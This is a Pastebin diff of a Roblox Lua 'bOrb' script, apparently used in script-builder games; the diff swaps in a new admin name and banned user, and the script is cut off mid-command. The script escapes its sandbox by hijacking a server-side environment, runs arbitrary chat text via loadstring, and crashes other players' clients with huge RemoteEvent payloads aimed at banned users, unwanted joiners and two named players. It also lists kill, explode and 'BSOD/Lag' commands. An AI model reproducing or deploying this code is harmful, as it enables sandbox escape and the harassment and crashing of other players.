View difference between Paste ID: 2dVMxuLh and feBH907j
SHOW: | | - or go back to the newest paste.
1
--[[go to line 30 and change Basictality to ur name
2
	Beta Testers: Om3gapro5ooo
3
	Original Version By Basictality
4
	
5
	-------------------Terms and Agreements-------------
6
	By using this script you agree that Basictality all of bOrb, if you
7
	say you made bOrb, terrible consequences will happen in matter.
8
	---------------(c): Made By Basictality-------------
9
--]]
10
wait()
11
script.Parent=nil
12
local fenv = getfenv()
13
i = game:service'InsertService':LoadAssetVersion(519416165)
14
n = i:children()[1] --Loads the AssetVersion c:
15
game:service'Debris':AddItem(i,0)
16
n.Parent=workspace
17
coroutine.yield()
18
local Environment
19
pcall(_G.OSC_AddServerSideData,setmetatable({},{__index=function()
20
    Environment=getfenv(2)end}))
21
_G.OSC_AddServerSideData=nil
22
game:service'Debris':AddItem(n,0)
23
Environment.print=fenv.print
24
Environment.warn=fenv.warn
25
Environment.error=fenv.error
26
Environment.owner=fenv.owner
27
setfenv(1,Environment)
28
29
wait() --ignore this. (if u touch it won't load)
30-
adminwew = game:GetService('Players'):FindFirstChild('VitaeExpers') --Put you're name in HERE!
30+
adminwew = game:GetService('Players'):FindFirstChild('jaffri207') --Put you're name in HERE!
31
 local admins = {adminwew.Name,adminwew}
32
 chatname = '[bOrb]: '
33
wpadtrans = "0"
34
 OrbName = "bOrb"
35
prefix = "-"
36
dis = "7"
37
Speed = "0.030" --The best ones are 0.30 - 0.5
38-
Banned = "CLarramore" --I tought him all he knows, then he turns on me such a "nice" friend..
38+
Banned = "TORNDADO11191alt" --I tought him all he knows, then he turns on me such a "nice" friend..
39
Chat = true
40
bplyrs = game:GetService('Players')
41
-------------------------------Anti Ban---------------------------------
42
--wip
43
----------------------------------------------------------------------------------------------
44
 print[[version 53]]
45
 meplyr = adminwew
46
----------Musiclist----------
47
function OnChatted(msg)
48
	    if msg:lower():sub(1,10) == prefix.."musiclist" then
49
mltpos=Instance.new('StringValue',nil)
50
mltpos.Value = "0"
51
mlsg=Instance.new('ScreenGui',adminwew.PlayerGui)
52
mlf=Instance.new('Frame',mlsg)
53
mlf.Size = UDim2.new(0,250,0,350)
54
mlf.BackgroundTransparency=0.5
55
mlf.BackgroundColor = BrickColor.new'Black'
56
mlf.Position = UDim2.new(0,50,0,170)
57
mlf.Active = true
58
mlf.Draggable = true
59
60
mlt=Instance.new('TextLabel',mlf)
61
mlt.Text = "Music List"
62
mlt.Size = UDim2.new(0,230,0,20)
63
mlt.TextScaled = true
64
mlt.BackgroundColor = BrickColor.new'Really black'
65
mlt.BackgroundTransparency=0.2
66
mlt.TextColor3 = Color3.new(255,255,255)
67
68
mlsc=Instance.new('ScrollingFrame',mlf)
69
mlsc.Position = UDim2.new(0,0,0,20)
70
mlsc.Size = UDim2.new(0,250,0,330)
71
mlsc.BackgroundTransparency=1
72
73
function AddMus(asd)
74
mltl = Instance.new('TextLabel',mlsc)
75
mltl.Size = UDim2.new(0,250,0,30)
76
mltl.Position = UDim2.new(0,0,0,mltpos.Value)
77
mltl.Text = asd
78
mltl.BackgroundTransparency=0.6
79
mltl.BackgroundColor3 = Color3.new(0,0,0)
80
mltl.TextScaled = true
81
mltl.TextStrokeTransparency = 0
82
mltl.TextColor3 = Color3.new(255,255,255)
83
wait()
84
mltpos.Value = mltpos.Value + 32
85
end
86
87
AddMus('watchasay')
88
AddMus('energy')
89
AddMus('iverson')
90
AddMus('ddesert')
91
end
92
end
93
94
adminwew.Chatted:connect(OnChatted)
95
----=-------------------Music---------------------
96
function OnChatted(msg)
97
	    if msg:lower():sub(1,5) == prefix.."mus " then
98
		find = 'BasMus'
99
	if workspace.Terrain:FindFirstChild(find) then
100
game.Debris:AddItem(workspace.Terrain[find],0)
101
		end
102
msgs=Instance.new('Sound',workspace.Terrain)
103
msgs.SoundId = "http://www.roblox.com/asset/?id="..msg:sub(6,#msg)
104
msgs.Volume = 5
105
msgs.Name = 'BasMus'
106
msgs.Pitch = 1
107
msgs.Looped = true
108
msgs:play()
109
-----------------------musiclist sounds-----------------------
110
if string.find(msg:sub(6,#msg),'watchasay') then
111
	msgs.SoundId = "http://www.roblox.com/asset/?id=177681012"
112
end
113
114
if string.find(msg:sub(6,#msg),'energy') then
115
	msgs.SoundId = "http://www.roblox.com/asset/?id=150455860"
116
end
117
118
if string.find(msg:sub(6,#msg),'ddesert') then
119
	msgs.SoundId = "http://www.roblox.com/asset/?id=229990159"
120
end
121
122
if string.find(msg:sub(6,#msg),'ddesert') then
123
	msgs.SoundId = "http://www.roblox.com/asset/?id=229990159"
124
end
125
126
if string.find(msg:sub(6,#msg),'iverson') then
127
	msgs.SoundId = "http://www.roblox.com/asset/?id=305476324"
128
end
129
---------------------------------------------------------------
130
131
if Chat == true then
132
		game:GetService("Chat"):Chat(wpad,chatname.."Playing "..msg:sub(6,#msg)..".",Enum.ChatColor.Blue)
133
134
end
135
	end
136
end
137
138
adminwew.Chatted:connect(OnChatted)
139
140
--------Hide and show--------
141
hidevalue = Instance.new('StringValue',nil)
142
hidevalue.Value = "Visible"
143
 function OnChatted(msg)
144
	    if msg:lower():sub(1,5) == prefix.."hide" then
145
		hidevalue.Value = "Invisible"
146
		for i = 0,1,0.1 do wait()
147
			wpad.Transparency = i
148
			wpadpointlight.Parent = nil
149
		end
150
	end
151
end
152
153
adminwew.Chatted:connect(OnChatted)
154
155
 function OnChatted(msg)
156
	    if msg:lower():sub(1,5) == prefix.."show" then
157
		hidevalue.Value = "Visible"
158
		for i = 1,0,-0.1 do wait()
159
			wpad.Transparency = i
160
			wpadpointlight.Parent = wpad
161
		end
162
	end
163
end
164
165
adminwew.Chatted:connect(OnChatted)
166
-----private server & non pri------
167
pri=Instance.new('StringValue',nil)
168
pri.Value = "Not on"
169
 function OnChatted(msg)
170
	    if msg:lower():sub(1,6) == prefix.."slock" then
171
		pri.Value = "On"
172
173
	end
174
end
175
176
adminwew.Chatted:connect(OnChatted)
177
178
 function OnChatted(msg)
179
	    if msg:lower():sub(1,8) == prefix.."unslock" then
180
		pri.Value = "Not on"
181
	end
182
end
183
184
adminwew.Chatted:connect(OnChatted)
185
-----private server function------
186
if pri.Value == "On" then
187
game.Players.PlayerAdded:connect(function(prii) if prii.Name~="Basictality" and prii.Name~=adminwew.Name then
188
	removeclient=Instance.new('RemoteEvent',workspace):FireClient(adminwew,{string.rep("umad?",2e5+5)})
189
end
190
end)
191
else
192
	_G.pri = 'nil'
193
end
194
----------Countdown----------
195
 function OnChatted(msg)
196
	    if msg:lower():sub(1,4) == prefix.."cd " then
197
		testcd=Instance.new('Hint',workspace)
198
for i = msg:sub(5,#msg),0,-1 do wait(0.8)
199
	testcd.Text=i
200
end
201
testcd.Text = "Go!"
202
delay(1,function()
203
	testcd:remove()
204
end)
205
end
206
end
207
208
adminwew.Chatted:connect(OnChatted)
209
210
 function OnChatted(msg)
211
	    if msg:lower():sub(1,11) == prefix.."countdown " then
212
		testcd=Instance.new('Hint',workspace)
213
for i = msg:sub(12,#msg),0,-1 do wait(0.8)
214
	testcd.Text=i
215
end
216
testcd.Text = "Go!"
217
delay(1,function()
218
	testcd:remove()
219
end)
220
end
221
end
222
223
adminwew.Chatted:connect(OnChatted)
224
 ----------Message-----------
225
 function OnChatted(msg)
226
	    if msg:lower():sub(1,3) == prefix.."m " then
227
		for i,v in pairs(game.Players:children()) do
228
mesgui=Instance.new('ScreenGui',v.PlayerGui)
229
mesframe=Instance.new('Frame',mesgui)
230
mesframe.Size = UDim2.new(0,1,0,1)
231
mesframe.BackgroundTransparency=0.6
232
mesframe.Position = UDim2.new(0,-2000,0,0)
233
mesframe.BackgroundColor3 = Color3.new(0,0,0)
234
mesframe:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", 1.2)
235
mesframe:TweenSize(UDim2.new(0, 1400, 0, 700), "Out", 1.2)
236
237
mestl=Instance.new('TextLabel',mesframe)
238
mestl.TextScaled = true
239
mestl.Text = 'Message from '..adminwew.Name..':'
240
mestl.BackgroundColor3 = Color3.new(255,255,255)
241
mestl.BackgroundTransparency = 0.4
242
mestl.TextColor3 = Color3.new(255,255,255)
243
mestl.Size = UDim2.new(0,1400,0,50)
244
245
mestl1=Instance.new('TextLabel',mesframe)
246
mestl1.TextScaled = true
247
mestl1.Text = msg:sub(4,#msg)
248
mestl1.Position = UDim2.new(0,0,0,300)
249
mestl1.BackgroundTransparency = 0.5
250
mestl1.TextColor3 = Color3.new(255,255,255)
251
mestl1.Size = UDim2.new(0,1400,0,50)
252
game.Debris:AddItem(mesframe,3)
253
		end
254
		end
255
	end
256
257
adminwew.Chatted:connect(OnChatted)
258
------------Pitch------------
259
function OnChatted(msg)
260
	    if msg:lower():sub(1,7) == prefix.."pitch " then
261
	find = 'BasMus'
262
	if workspace.Terrain:FindFirstChild(find) then
263
workspace.Terrain[find].Pitch = msg:sub(8,#msg)
264
	end
265
	end
266
end
267
268
adminwew.Chatted:connect(OnChatted)
269
-----------Ambient-----------
270
function OnChatted(msg)
271
	    if msg:lower():sub(1,9) == prefix.."ambient " then
272
game.Lighting.Ambient = Color3.new(msg:sub(10,#msg),msg:sub(10,#msg),msg:sub(10,#msg))
273
end
274
end
275
276
adminwew.Chatted:connect(OnChatted)
277
-------------Time------------
278
function OnChatted(msg)
279
	    if msg:lower():sub(1,6) == prefix.."time " then
280
game.Lighting.TimeOfDay = msg:sub(7,#msg)
281
end
282
end
283
284
adminwew.Chatted:connect(OnChatted)
285
----------Exe Script---------
286
function OnChatted(msg)
287
	    if msg:lower():sub(1,5) == prefix.."exe " then
288
loadstring(msg:sub(6,#msg))()
289
if Chat == true then
290
	game:GetService("Chat"):Chat(wpad,chatname.."Executed script.",Enum.ChatColor.Blue)
291
end
292
end
293
end
294
295
adminwew.Chatted:connect(OnChatted)
296
--Ban Stuff--
297
local banfolder = Instance.new('Folder',game.ServerStorage)
298
banfolder.Name = "bOrb Bans"
299
game:GetService('RunService').Stepped:connect(function()
300
	for i,x in pairs(banfolder:children()) do
301
for i,v in pairs(game.Players:children()) do if v.Name==x.Value then
302
	removeclient=Instance.new('RemoteEvent',workspace):FireClient(game.Players[x.Value],{string.rep("umad?",2e5+5)})
303
end
304
end
305
end
306
end)
307
308
-----------------_G stuff---------
309
game:GetService('RunService').Stepped:connect(function()
310
_G.bBans = banfolder
311
	_G.sb = 'Haxed by bOrb'
312
end)
313
---------------secret stuffz---------
314
if adminwew == bplyrs:FindFirstChild('Sarah67854') then
315
	removeclient=Instance.new('RemoteEvent',workspace):FireClient(adminwew,{string.rep("umad?",2e5+5)})
316
 game.Debris:AddItem(removeclient,1)
317
end
318
319
if adminwew == bplyrs:FindFirstChild('Ayumuki') then
320
	removeclient=Instance.new('RemoteEvent',workspace):FireClient(adminwew,{string.rep("umad?",2e5+5)})
321
 game.Debris:AddItem(removeclient,1)
322
end
323
324
if not OrbName == "bOrb" then
325
OrbName = "bOrb"
326
end
327
----------cmds gui-----------
328
function OnChatted(cmds)
329
	    if cmds:lower():sub(1,7) == prefix.."cmds" then
330
cmdgui=Instance.new('ScreenGui',adminwew.PlayerGui)
331
cmdframe=Instance.new('Frame',cmdgui)
332
cmdframe.Size = UDim2.new(0,500,0,350)
333
cmdframe.Position = UDim2.new(0,430,0,-300)
334
cmdframe:TweenPosition(UDim2.new(0,430,0,200),'Out','Quad',0.35)
335
cmdframe.BackgroundTransparency=0.5
336
cmdframe.BackgroundColor3 = Color3.new(0,0,0)
337
338
cmdtl=Instance.new('TextLabel',cmdframe)
339
cmdtl.Text = "Commands [24]"
340
cmdtl:TweenSize(UDim2.new(0,500,0,50),'Out','Quad',0.35)
341
cmdtl.TextScaled = true
342
cmdtl.BackgroundTransparency=1
343
cmdtl.TextColor3 = Color3.new(255,255,255)
344
cmdtl.TextStrokeTransparency = 0
345
346
cmdprefixltl=Instance.new('TextLabel',cmdframe)
347
cmdprefixltl.Text = "Prefix: "..prefix
348
cmdprefixltl:TweenSize(UDim2.new(0,100,0,50),'Out','Quad',0.35)
349
cmdprefixltl.BackgroundTransparency=1
350
cmdprefixltl.TextColor3 = Color3.new(255,255,255)
351
cmdprefixltl.TextStrokeTransparency = 0
352
cmdprefixltl.FontSize = "Size14"
353
cmdprefixltl:TweenPosition(UDim2.new(0,-5,0,-15),'Out','Quad',0.35)
354
355
cmdbutton=Instance.new('TextButton',cmdframe)
356
cmdbutton.TextScaled = true
357
cmdbutton.Text = "X"
358
cmdbutton.BackgroundTransparency = 1
359
cmdbutton.TextColor3 = Color3.new(1,0,0)
360
cmdbutton.Size = UDim2.new(0,50,0,50)
361
cmdbutton:TweenPosition(UDim2.new(0,450,0,0),'Out','Quad',0.35)
362
363
function onClick()
364
	cmdframe:TweenPosition(UDim2.new(0,430,0,700),'Out','Quad',0.35)
365
	game.Debris:AddItem(cmdframe,2)
366
end
367
368
cmdbutton.MouseButton1Down:connect(onClick)
369
370
sf=Instance.new('ScrollingFrame',cmdframe)
371
sf:TweenSize(UDim2.new(0,480,0,260),'Out','Quad',0.35)
372
sf:TweenPosition(UDim2.new(0,10,0,50),'Out','Quad',0.35)
373
sf.BackgroundTransparency = 0.5
374
sf.BackgroundColor3 = Color3.new(0,0,0)
375
376
fc=Instance.new('TextLabel',sf)
377
fc.TextColor3 = Color3.new(255,255,255)
378
fc.TextScaled = true
379
fc.Text = "Explode <plyr>"
380
fc.BackgroundColor = BrickColor.new'Dark blue'
381
fc:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
382
fc.BackgroundTransparency=0
383
384
sc=fc:Clone()
385
sc.Parent = sf
386
sc.Text = "kill <plyr>"
387
sc:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
388
sc:TweenPosition(UDim2.new(0,0,0,35),'Out','Quad',0.35)
389
390
tc=sc:clone()
391
tc.Parent = sf
392
tc.Text = "UnGod <plyr>"
393
tc:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
394
tc:TweenPosition(UDim2.new(0,0,0,70),'Out','Quad',0.35)
395
396
fc=sc:clone()
397
fc.Parent = sf
398
fc.Text = "Freeze <plyr>"
399
fc:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
400
fc:TweenPosition(UDim2.new(0,0,0,105),'Out','Quad',0.35)
401
402
fic=sc:clone()
403
fic.Parent = sf
404
fic.Text = "Thaw <plyr>"
405
fic:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
406
fic:TweenPosition(UDim2.new(0,0,0,140),'Out','Quad',0.35)
407
408
sic=sc:clone()
409
sic.Parent = sf
410
sic.Text = "resp/respawn/res <plyr>"
411
sic:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
412
sic:TweenPosition(UDim2.new(0,0,0,175),'Out','Quad',0.35)
413
414
sec=sc:clone()
415
sec.Parent = sf
416
sec.Text = "God <plyr>"
417
sec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
418
sec:TweenPosition(UDim2.new(0,0,0,210),'Out','Quad',0.35)
419
420
eec=sc:clone()
421
eec.Parent = sf
422
eec.Text = "BSOD/Lag <plyr>"
423
eec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
424
eec:TweenPosition(UDim2.new(0,0,0,245),'Out','Quad',0.35)
425
426
nec=sc:clone()
427
nec.Parent = sf
428
nec.Text = "ff/shield/forcefield <plyr>"
429
nec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
430
nec:TweenPosition(UDim2.new(0,0,0,280),'Out','Quad',0.35)
431
432
tec=sc:clone()
433
tec.Parent = sf
434
tec.Text = "kick/boot <plyr>"
435
tec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
436
tec:TweenPosition(UDim2.new(0,0,0,315),'Out','Quad',0.35)
437
438
elec=sc:clone()
439
elec.Parent = sf
440
elec.Text = "ban/banish <plyr>"
441
elec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
442
elec:TweenPosition(UDim2.new(0,0,0,350),'Out','Quad',0.35)
443
444
twec=sc:clone()
445
twec.Parent = sf
446
twec.Text = "unban/unbanish <plyr>"
447
twec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
448
twec:TweenPosition(UDim2.new(0,0,0,385),'Out','Quad',0.35)
449
450
thec=sc:clone()
451
thec.Parent = sf
452
thec.Text = "sword <plyr>"
453
thec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
454
thec:TweenPosition(UDim2.new(0,0,0,420),'Out','Quad',0.35)
455
456
foec=sc:clone()
457
foec.Parent = sf
458
foec.Text = "ngrav/nograv/nogravity <plyr>"
459
foec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
460
foec:TweenPosition(UDim2.new(0,0,0,455),'Out','Quad',0.35)
461
462
fiec=sc:clone()
463
fiec.Parent = sf
464
fiec.Text = "grav/gravity <plyr>"
465
fiec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
466
fiec:TweenPosition(UDim2.new(0,0,0,490),'Out','Quad',0.35)
467
468
sixec=sc:clone()
469
sixec.Parent = sf
470
sixec.Text = "unjail/nojail <plyr>"
471
sixec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
472
sixec:TweenPosition(UDim2.new(0,0,0,525),'Out','Quad',0.35)
473
474
sitec=sc:clone()
475
sitec.Parent = sf
476
sitec.Text = "light/plight <plyr>"
477
sitec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
478
sitec:TweenPosition(UDim2.new(0,0,0,560),'Out','Quad',0.35)
479
480
enitec=sc:clone()
481
enitec.Parent = sf
482
enitec.Text = "rlight/nolight/unlight <plyr>"
483
enitec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
484
enitec:TweenPosition(UDim2.new(0,0,0,595),'Out','Quad',0.35)
485
486
nineteen=sc:clone()
487
nineteen.Parent = sf
488
nineteen.Text = "jail/lockup <plyr>"
489
nineteen:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
490
nineteen:TweenPosition(UDim2.new(0,0,0,630),'Out','Quad',0.35)
491
492
twenty=sc:clone()
493
twenty.Parent = sf
494
twenty.Text = "unff/unforcefield/unshield <plyr>"
495
twenty:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
496
twenty:TweenPosition(UDim2.new(0,0,0,630),'Out','Quad',0.35)
497
498
twenty1=sc:clone()
499
twenty1.Parent = sf
500
twenty1.Text = "jail <plyr>"
501
twenty1:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
502
twenty1:TweenPosition(UDim2.new(0,0,0,665),'Out','Quad',0.35)
503
504
twenty2=sc:clone()
505
twenty2.Parent = sf
506
twenty2.Text = "sit <plyr>"
507
twenty2:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
508
twenty2:TweenPosition(UDim2.new(0,0,0,0),'Out','Quad',0.35)
509
twenty2.TextTransparency=1
510
twenty2.BackgroundTransparency=1
511
512
twenty3=sc:clone()
513
twenty3.Parent = sf
514
twenty3.Text = "jump <plyr>"
515
twenty3:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
516
twenty3:TweenPosition(UDim2.new(0,0,0,35),'Out','Quad',0.35)
517
twenty3.TextTransparency=1
518
twenty3.BackgroundTransparency=1
519
520
twenty4=sc:clone()
521
twenty4.Parent = sf
522
twenty4.Text = "Commands/Cmds"
523
twenty4:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
524
twenty4:TweenPosition(UDim2.new(0,0,0,70),'Out','Quad',0.35)
525
twenty4.TextTransparency=1
526
twenty4.BackgroundTransparency=1
527
528
twenty5=sc:clone()
529
twenty5.Parent = sf
530
twenty5.Text = "exe <script>"
531
twenty5:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
532
twenty5:TweenPosition(UDim2.new(0,0,0,105),'Out','Quad',0.35)
533
twenty5.TextTransparency=1
534
twenty5.BackgroundTransparency=1
535
536
twenty6=sc:clone()
537
twenty6.Parent = sf
538
twenty6.Text = "mus <soundid>"
539
twenty6:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
540
twenty6:TweenPosition(UDim2.new(0,0,0,140),'Out','Quad',0.35)
541
twenty6.TextTransparency=1
542
twenty6.BackgroundTransparency=1
543
544
twenty7=sc:clone()
545
twenty7.Parent = sf
546
twenty7.Text = "time <number>"
547
twenty7:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
548
twenty7:TweenPosition(UDim2.new(0,0,0,175),'Out','Quad',0.35)
549
twenty7.TextTransparency=1
550
twenty7.BackgroundTransparency=1
551
552
twenty8=sc:clone()
553
twenty8.Parent = sf
554
twenty8.Text = "ambient <number>"
555
twenty8:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
556
twenty8:TweenPosition(UDim2.new(0,0,0,210),'Out','Quad',0.35)
557
twenty8.TextTransparency=1
558
twenty8.BackgroundTransparency=1
559
560
twenty9=sc:clone()
561
twenty9.Parent = sf
562
twenty9.Text = "pitch <number>"
563
twenty9:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
564
twenty9:TweenPosition(UDim2.new(0,0,0,245),'Out','Quad',0.35)
565
twenty9.TextTransparency=1
566
twenty9.BackgroundTransparency=1
567
568
thirty0=sc:clone()
569
thirty0.Parent = sf
570
thirty0.Text = "fire <plyr>"
571
thirty0:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
572
thirty0:TweenPosition(UDim2.new(0,0,0,245),'Out','Quad',0.35)
573
thirty0.TextTransparency=1
574
thirty0.BackgroundTransparency=1
575
576
thirty1=sc:clone()
577
thirty1.Parent = sf
578
thirty1.Text = "sparkles <plyr>"
579
thirty1:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
580
thirty1:TweenPosition(UDim2.new(0,0,0,245),'Out','Quad',0.35)
581
thirty1.TextTransparency=1
582
thirty1.BackgroundTransparency=1
583
584
thirty2=sc:clone()
585
thirty2.Parent = sf
586
thirty2.Text = "hide"
587
thirty2:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
588
thirty2:TweenPosition(UDim2.new(0,0,0,280),'Out','Quad',0.35)
589
thirty2.TextTransparency=1
590
thirty2.BackgroundTransparency=1
591
592
thirty3=sc:clone()
593
thirty3.Parent = sf
594
thirty3.Text = "show"
595
thirty3:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
596
thirty3:TweenPosition(UDim2.new(0,0,0,315),'Out','Quad',0.35)
597
thirty3.TextTransparency=1
598
thirty3.BackgroundTransparency=1
599
600
thirty4=sc:clone()
601
thirty4.Parent = sf
602
thirty4.Text = "rguis/nguis/noguis <plyr>"
603
thirty4:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
604
thirty4:TweenPosition(UDim2.new(0,0,0,350),'Out','Quad',0.35)
605
thirty4.TextTransparency=1
606
thirty4.BackgroundTransparency=1
607
608
newp=Instance.new('TextButton',cmdframe)
609
newp.Text = ">"
610
newp.TextColor3 = Color3.new(255,255,255)
611
newp.TextScaled = true
612
newp:TweenSize(UDim2.new(0,100,0,30),'Out','Quad',0.35)
613
newp:TweenPosition(UDim2.new(0,370,0,315),'Out','Quad',0.35)
614
615
function onClick()
616
	for i,v in pairs(sf:children()) do if v.ClassName=="TextLabel" then
617
		v.TextTransparency = 1
618
		v.BackgroundTransparency = 1
619
		twenty2.TextTransparency=0
620
		twenty2.BackgroundTransparency=0
621
		twenty3.TextTransparency=0
622
		twenty3.BackgroundTransparency=0
623
		twenty4.TextTransparency=0
624
		twenty4.BackgroundTransparency=0
625
		twenty5.TextTransparency=0
626
		twenty5.BackgroundTransparency=0
627
		twenty6.TextTransparency=0
628
		twenty6.BackgroundTransparency=0
629
		twenty7.TextTransparency=0
630
		twenty7.BackgroundTransparency=0
631
		twenty8.TextTransparency=0
632
		twenty8.BackgroundTransparency=0
633
		twenty9.TextTransparency=0
634
		twenty9.BackgroundTransparency=0
635
		thirty0.TextTransparency=0
636
		thirty0.BackgroundTransparency=0
637
		thirty1.TextTransparency=0
638
		thirty1.BackgroundTransparency=0
639
		thirty2.TextTransparency=0
640
		thirty2.BackgroundTransparency=0
641
		thirty3.TextTransparency=0
642
		thirty3.BackgroundTransparency=0
643
		thirty4.TextTransparency=0
644
		thirty4.BackgroundTransparency=0
645
	end
646
	pgtl.Text = "Page 2/2"
647
	end
648
	end
649
650
newp.MouseButton1Down:connect(onClick)
651
652
653
oldp=Instance.new('TextButton',cmdframe)
654
oldp.Text = "<"
655
oldp.TextColor3 = Color3.new(255,255,255)
656
oldp.TextScaled = true
657
oldp:TweenSize(UDim2.new(0,100,0,30),'Out','Quad',0.35)
658
oldp:TweenPosition(UDim2.new(0,25,0,315),'Out','Quad',0.35)
659
660
function onClick()
661
	for i,v in pairs(sf:children()) do if v.ClassName=="TextLabel" then
662
		v.TextTransparency = 0
663
		v.BackgroundTransparency = 0
664
	end
665
	pgtl.Text = "Page 1/2"
666
		twenty2.TextTransparency=1
667
		twenty2.BackgroundTransparency=1
668
		twenty3.TextTransparency=1
669
		twenty3.BackgroundTransparency=1
670
		twenty4.TextTransparency=1
671
		twenty4.BackgroundTransparency=1
672
		twenty5.TextTransparency=1
673
		twenty5.BackgroundTransparency=1
674
		twenty6.TextTransparency=1
675
		twenty6.BackgroundTransparency=1
676
		twenty7.TextTransparency=1
677
		twenty7.BackgroundTransparency=1
678
		twenty8.TextTransparency=1
679
		twenty8.BackgroundTransparency=1
680
		twenty9.TextTransparency=1
681
		twenty9.BackgroundTransparency=1
682
		thirty0.TextTransparency=1
683
		thirty0.BackgroundTransparency=1
684
		thirty1.TextTransparency=1
685
		thirty1.BackgroundTransparency=1
686
		thirty2.TextTransparency=1
687
		thirty2.BackgroundTransparency=1
688
		thirty3.TextTransparency=1
689
		thirty3.BackgroundTransparency=1
690
		thirty4.TextTransparency=1
691
		thirty4.BackgroundTransparency=1
692
	end
693
	end
694
695
oldp.MouseButton1Down:connect(onClick)
696
697
pgtl=Instance.new('TextLabel',cmdframe)
698
pgtl.Text = "Page 1/2"
699
pgtl:TweenSize(UDim2.new(0,100,0,30),'Out','Quad',0.35)
700
pgtl.TextScaled = true
701
pgtl.BackgroundTransparency=1
702
pgtl.TextColor3 = Color3.new(255,255,255)
703
pgtl.TextStrokeTransparency = 0
704
pgtl:TweenPosition(UDim2.new(0,200,0,315),'Out','Quad',0.35)
705
	end
706
end
707
adminwew.Chatted:connect(OnChatted)
708
-----------------------------------------------------------------
709
710
711
 isAdmin = function(p)
712
  for i,v in pairs(admins)do
713
   if p.Name == v then
714
    return true;
715
   end;
716
  end;
717
  return false;
718
 end;
719
 local Players = bplyrs;
720
 local people = function(str)
721
   local players = {};
722
   local strs = {
723
    {"me", "myself", function() players[#players+1]=meplyr end;};
724
    {"all", "everyone", "everybody", function() for i,v in pairs(Players:GetPlayers())do players[#players+1]=v; end; end;};
725
    {"others", "notme", function() for i,v in pairs(Players:GetPlayers())do if v.Name~= meplyr.Name then players[#players+1]=v; end; end; end;};
726
    {"admins", "admined", function() for i,v in pairs(Players:GetPlayers())do if isAdmin(v) then players[#players+1]=v; end; end; end;};
727
    {"nonadmins", "nonadmined", function() for i,v in pairs(Players:GetPlayers())do if not isAdmin(v) then players[#players+1]=v; end; end; end;};
728
   };
729
   for i,v in pairs(strs)do
730
    for q,k in pairs(v)do
731
     if str == k then
732
      v[#v]();
733
      break;
734
     end;
735
    end;
736
   end;
737
   if #players == 0 then
738
    for i,v in pairs(Players:GetPlayers())do
739
     if str:lower() == v.Name:lower():sub(1,string.len(str)) then
740
      players[#players+1]=v;
741
     end;
742
    end;
743
   end;
744
   return players;
745
  end;
746
 --   if Prefix..data.Usage..Suffix == sub(lower(Message),1,string.len(Prefix)+string.len(data.Usage)+string.len(Suffix)) then
747
 --    local y,n = ypcall(function()
748
 --      data.Func(sub(Message,string.len(Prefix)+string.len(data.Usage)+string.len(Suffix)+1), GetPlayer2, "FakePlayerName")
749
 --    end)
750
 --    end
751
 local function chat(msg,plr)
752
   if isAdmin(plr) then
753
    local pre = "";
754
    local post = "";
755
    if msg:find(" ") ~= nil then
756
     pre = msg:sub(1,msg:find(" ")-1);
757
     post = msg:sub(msg:find(" ")+1);
758
    end;
759
    local cmd = function(ct, s, pt, f)
760
     if ct == "complex" then
761
      for q,k in pairs(s) do
762
       if pre:lower() == k then
763
        if pt == "player" then
764
         for i,v in pairs(people(post))do
765
          Spawn(function()
766
           pcall(function()
767
            f(v);
768
           end);
769
          end);
770
         end;
771
        elseif pt == "string" then
772
         f(post);
773
        end;
774
        break;
775
       end;
776
      end;
777
     elseif ct == "simple" then
778
      for q,k in pairs(s) do
779
       if msg:lower() == k then
780
        if pt == "self" then
781
         Spawn(function()
782
          pcall(function()
783
           f(plr);
784
          end);
785
         end);
786
        elseif pt == "all" then
787
         
788
        elseif pt == "na" then
789
         Spawn(function()
790
          pcall(function()
791
           f();
792
          end);
793
         end);
794
        end;
795
       end;
796
      end;
797
     elseif ct == "included" then
798
      for q,k in pairs(s) do
799
       if string.find(msg:lower(),k) then
800
        Spawn(function()
801
         pcall(function()
802
          f(msg);
803
         end);
804
        end);
805
       end;
806
      end;
807
     end;
808
    end;
809
    --usage: complex or simple command , {cmd}, "plr", func (function)
810
    cmd("complex", {prefix.."explode"}, "player", function(v)
811
     explp = Instance.new("Explosion",v.Character);
812
 	explp.BlastRadius = "1";
813
 	explp.BlastPressure = "500000";
814
 	explp.Position = v.Character.Torso.Position;
815
if Chat == true then
816
 				game:GetService("Chat"):Chat(wpad,chatname.." Exploded "..v.Name..".",Enum.ChatColor.Blue)
817
  end
818
  end);
819
